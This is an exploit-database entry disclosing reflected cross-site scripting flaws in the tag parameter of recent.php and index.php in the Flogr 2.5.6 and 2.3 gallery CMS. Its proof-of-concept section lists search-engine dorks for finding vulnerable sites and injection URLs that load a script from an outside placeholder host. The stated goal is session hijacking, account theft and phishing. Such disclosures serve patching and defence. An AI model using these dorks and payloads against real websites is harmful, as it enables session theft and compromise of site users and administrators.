Flogr 2.5.6 / 2.3 Cross Site Scripting Vulnerabilities

2012-08-11T00:00:00
ID 1337DAY-ID-19168
Type zdt
Reporter Nafsh
Modified 2012-08-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Flogr v2.5.6 & v2.3 - Cross Site Script Vulnerabilities

Details:
========
Multiple non persistent cross site scripting vulnerabilities are detected in the Flogr v2.5.6 & v2.3 photo gallery CMS.
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required 
user inter action or local low privileged user account. The vulnerabilities are located in the recent.php & index.php 
with the bound vulnerable tag parameter. Successful exploitation can result in account steal, phishing & client-side 
content request manipulation.


Vulnerable Module(s):
      [+] Recent Listing
      [+] Index Listing

Vulnerable File(s):
      [+] Recent.php
      [+] Index.php

Vulnerable Parameter(s):
      [+] Tag


Proof of Concept:
=================
Dork(s): 
inurl:"tag=" "powered by flogr v2.3"
inurl:"tag=" "powered by flogr v2.5.6"
inurl:"tag=" "powered by flogr v1.7" 

PoC:
http://[TARGET]/recent.php?tag=[CROSS SITE SCRIPTING]
http://[TARGET]/index.php?tag=[CROSS SITE SCRIPTING]

Reference(s):
xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E
xxx.com/bigpictureproject/index.php?tag=<script src%3d//xxx.com/s></script>
xxx.com/flogr/recent.php?tag=<script src%3d//xxx.com/s></script>
xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E


Risk:
=====
The security risk of the client side cross site scripting vulnerabilities are estimated as low(+)|(-)medium.



#  0day.today [2018-02-09]  #